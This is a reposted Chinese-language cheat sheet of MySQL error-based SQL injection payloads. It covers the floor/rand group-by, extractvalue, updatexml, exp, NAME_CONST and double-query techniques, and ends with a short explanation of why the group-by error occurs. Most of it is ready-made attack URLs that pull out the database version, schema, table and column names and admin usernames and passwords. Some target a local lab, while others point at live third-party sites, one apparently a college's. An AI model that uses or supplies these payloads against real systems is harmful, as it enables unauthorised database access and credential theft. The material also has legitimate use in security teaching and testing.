MySQL報錯注入總結

mysql暴錯注入方法整理，經過floor，UpdateXml，ExtractValue，NAME_CONST，Error based Double Query Injection等方法。

報錯注入：（and後不能直接跟select，能夠加（））

1.報錯注入floor---->(select 1 from (select count(*),concat((payload[]),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1
2.報錯注入extractvalue---->select extractvalue(1,concat(0x5c,([payload])))
3.報錯注入updatexml---->select 1=(updatexml(1,concat(0x3a,([payload])),1))
4.報錯注入Exp---->select Exp(~(select * from ([payload])a))

 

一、經過floor暴錯

/數據庫版本/

http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select version()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+

/簡單辦法暴庫/
http://www.waitalone.cn/sql.php?id=info()

/鏈接用戶/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)

/鏈接數據庫/
http://127.0.0.1/2/Less-5/?id=1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+

/暴庫/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)

/暴表/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)

/暴字段/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)

/暴內容/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
---------------------

二、ExtractValue(有長度限制,最長32位)

http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

三、UpdateXml(有長度限制,最長32位)

http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) 
http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

四、NAME_CONST(適用於低版本)

http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

五、Error based Double Query Injection

(http://www.vaibs.in/error-based-double-query-injection/)
/數據庫版本/
http://www.waitalone.cn/sql.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

 Rand() //隨機函數

 Floor() //取整函數

 Count() //聚合函數

 Group by key //分組語句

 

備註原理：

當在一個聚合函數，好比count函數後面若是使用分組語句就會把查詢的一部分以錯誤的形式顯示出來。[這個是Mysql的bug]。

http://127.0.0.1/s/Less-5/?id=1′ and (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1#

group by key的原理是循環讀取數據的每一行，將結果保存於臨時表中。讀取每一行的key時，若是key存在於臨時表中，則不在臨時表中更新臨時表中的數據；若是該key不存在於臨時表中，則在臨時表中插入key所在行的數據。group by floor(random(0)*2)出錯的緣由是key是個隨機數，檢測臨時表中key是否存在時計算了一下floor(random(0)*2)可能爲0，若是此時臨時表只有key爲1的行不存在key爲0的行，那麼數據庫要將該條記錄插入臨時表，因爲是隨機數，插時又要計算一下隨機值，此時 floor(random(0)*2)結果可能爲1，就會致使插入時衝突而報錯。即檢測時和插入時兩次計算了隨機數的值不一致，致使插入時與本來已存在的產生衝突的錯誤

轉載：http://www.javashuo.com/article/p-xvswhzlo-ba.html